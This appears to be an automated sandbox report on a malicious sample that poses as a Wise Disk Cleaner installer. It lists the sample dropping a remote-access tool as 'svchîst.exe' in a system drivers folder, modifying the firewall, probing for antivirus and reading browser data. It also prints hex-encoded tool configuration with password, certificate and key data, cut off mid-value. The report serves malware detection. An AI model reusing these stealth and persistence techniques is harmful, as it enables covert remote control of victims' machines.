Analysis Overview
SHA256
63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443
Threat Level: Known bad
The file 63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443 was found to be: Known bad.
Malicious Activity Summary
RMS
Drops file in Drivers directory
Modifies Windows Firewall
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Checks computer location settings
Checks for any installed AV software in registry
Checks installed software on the system
Enumerates connected drives
Drops file in System32 directory
Drops file in Program Files directory
Enumerates physical storage devices
Runs ping.exe
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Views/modifies file attributes
Modifies registry class
Modifies Internet Explorer settings
Kills process with taskkill
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-04-17 07:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-04-17 07:06
Reported
2022-04-17 07:08
Platform
win7-20220414-en
Max time kernel
148s
Max time network
154s
Command Line
Signatures
RMS
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\drivers\install.exe | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\svchîst.exe | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\svchîst.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\install.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-KQKMN.tmp\CSTask.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Modifies Windows Firewall
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Checks for any installed AV software in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\software\Wow6432Node\avast software\avast | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\software\avast software\avast | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\MACHINE\software\avira\antivir desktop | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\MACHINE\software\Wow6432Node\avira\antivir desktop | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\software\avira\antivirus | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\MACHINE\software\avast software\avast | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
Checks installed software on the system
Enumerates connected drives
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\idfgvgjnghcdfb.reg | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Windows\SysWOW64\idfgvgjnghcdfb.reg | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-5C1N5.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-OPTGD.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-GAOA0.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-G72EI.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-F6O34.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-32O7J.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-BG8EL.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-6PI5S.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-75449.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-KFGUG.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-58M2H.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-V319U.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-VQBJ1.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-0O9PS.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-KRLI7.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-PG44I.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-M18G2.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-1HUTB.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-SQ5H1.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-LMQEF.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-U4MAS.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDefrag.dll | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-D451B.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-5UE2M.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2H65H.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\LiveUpdate.exe | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-DR5QR.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-UADDU.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-U916K.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2GBAA.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-AUIT8.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-CNFVQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-6VCB3.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-GNDOM.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-7JUR2.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-9EEKT.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2DRG1.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.msg | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-G2VSA.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-K876C.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-DVIBG.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-73D7Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-87CMC.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-0QECA.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-Q04IE.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-LM4UH.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-8J92D.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-POD21.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-86RQ9.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-8PIBV.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-BFDUC.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-J1CUS.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\WiseDiskCleaner.exe = "11000" | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\FUSClientPath = "C:\\Windows\\SysWOW64\\drivers\\maskhostex.exe" | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223639313130223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c46574570794f456c45515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c4a484f58525a563278315355633161474a585657646a4d3278365a45645764456c49546d786a626c70775933704661553144515564424d5656465158643357677053527a6c305756647364556c484e5768695631566e597a4e73656d5248566e524a534535735932356163474e3651575647647a4235545770424d4531555933645056454579546b524f59555a334d48704e616b4577436b31555558645056454579546b524f5955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73525749794d576868567a526e596d314764467054516e6f4b5a56684f4d4670584d47646a4d6c5a355a473173656b31545358644a51566c45566c465252455243624556694d6a466f595663305a324a74526e526155304a365a56684f4d4670584d47646a4d6c5a355a4731736567704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a3074445156464651586c574e545a4d4d564e475a46526e51307777566c524352585659436e526b4d57684d6547564352557047536c5252536b4e36566c6b785a553958597a466f53564672524646304e5339775a3168346155526e62465a51566b5a4e4e306450516e524c574663775a336c3154303432526b304b4e47744b63584a4b5a6b4a4b6455356d637a4a474d7a5648596b6730554656615a6d5a3561336c6a536d31484e6b785a6357356a626d7075547a5a4c63475679634852745247467359575a77534539356445395352676f7a4c325177656e4532575868715255526f566c5652626d5a476355564554474e3555545a3561574e61527a6858614573774e48466e526b4e3353444245533164555a6e567861445a3152566b30563068364d553557436d7772646d646951546c5956566834516e424655466849647a5531646c687a5545394352454572626b35474d30785455335a714e554a5451304a61633151355a584255656c4e766257644d52557435635459345758554b57555a354e4735516432643053456869576e68685346524e62336b34596a465756564e765557787762305a6862486478643152715355786d52336442556b70736132525263325579554730795130356b614578316467704664306c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b4652516e67344d6b784b4e6c56474c326c354e334e4f616d646d596d744361334245616d557756573076436e564354566c4e624564594c334a536445355a4d6d4a365648564962446844566a6c6e4e7a5649596c5a4451326c615931684d636c424d4d7a42745a455979515778545447457764304e75617a525a596c566d636b4d4b4d336430617a4a6e53327076556e5a7a5657396159326f31596a5268566e427055325a6f656b3572545535515579744a566d4d3256433832646c637a516d497a64334d31536c42564e6a55326332706e5333464b4f51705364474a77596d464b566d35755747647a557a4e465157307a536b597a636d64485a7a6855656e4d765a307431646b35586248564f5258706157473831596e453462564a445756646f5931497a4e45397061545253436e4a514c3245355a4656564e6d39686233685a6455464863554a6854553135526d745662324648617a52344b3345784e3270334e6e5648546b6858547a4a4655465a69643074446257784d4b336b34643056686156514b51334a3553574e4a5955467561324d3257553130515746754f584e7a63476446576b39545557685154474e5555335a5163315643636d6c614d6c68345155643355554e3262546b726248634b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a5355563264306c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b74726432646e553278425a3056425157394a516b465252457059626d3932566b6c574d5539425358594b556c5a4e52564d315a54457a56305632526a524655577456624535426130784f566d70574e445661656c644661454e52546b4d7a62697474516d5a4853553944566c55355656563663316b30527a42775a474a545241704c4e44517a623156366156467463584e734f4556744e444572656c6c595a6d746163325a6e4f564a734f53394c5645703362566c6962335270635752355a55396a4e32397862445a3162544a5a546e465763437472436d4d33537a41315256686d4f544e5554334a77616b644e55553947566c4a445a4468586231464e6448704b52484a4c536e6872596e686852584a5561584642565578425a6c464e6346704f4b7a5a7853484530556d6f4b61466c6d55465578563167324b304a7a5244466b556d5a46523274524f574e6d524735744f5756334f44524654555132597a42595933524b5379745161305a4a53555a74654641784e6d7851546b74705955467a5551707953334a7965476b315a31684d61574d7651304d7759325230626b5a765a453135616b7834646c5a57556b746f513164745a315a7857454e79516b394e5a335134596b464352573158556a46446544645a4b324a5a436b6b784d6b56314e6a68555157644e516b464252554e6e5a305642597a5a35576b4a694d556b79546d643163314a69615842495355564856544a305a56453353574a72636a4e554e4867764f465a4c57474a325769384b616b6f785a446c4861444642626b4a686132565a565552595a564e475743747456554a7252485a45516b6c59536a465762575a4753484644567a67764e54564354444a54626a526d55316c74576c524f546e68584d416f326155644c5579396e626b5269545652525755567554564268596e51345347567a5a6a6333546d4e6d517a6c3357574a59656e685055544a554d4578615358645a63455a6d56544a57566b6c575679393063303578436d7379536b6335523234354e537476596b7055526d4a34576d343153556c745533513564323559546d307a536a5a33647a566b6347593255445a7457544a4f52485671625555795a30647655306779543270485932734b5a6d6c5563577874646e645a4f46563463484d316155706b53336c765a5852755a45464a61553954656b773561454d335656524b63576c6e54553575596c56474c33564d614374795532464361324e335a6b645264416f725a6c46735356425154306851515855335632465753587074646e5a56524564704e444a4f656c5a475957564e4d3278554c7a4e335931464c516d645252446c57553078695957706b61584e6f565552474f565655436e647955315a4a595664326130497665557073547a52716347355553556f31636d63304d4535684e7a6445616d566b6557527851324e325630465263304e7a55486c70623068505a30737a596a6c586446465a596c4d4b4b304e55617a5a3653464e354d6c42355458464656336b345232646f64475270576d7733595849335356463165476850526b4a53527a42564e7a45344e58563455793935536c686b61567056516c4a594c305a3454516f3562574e7559326c5a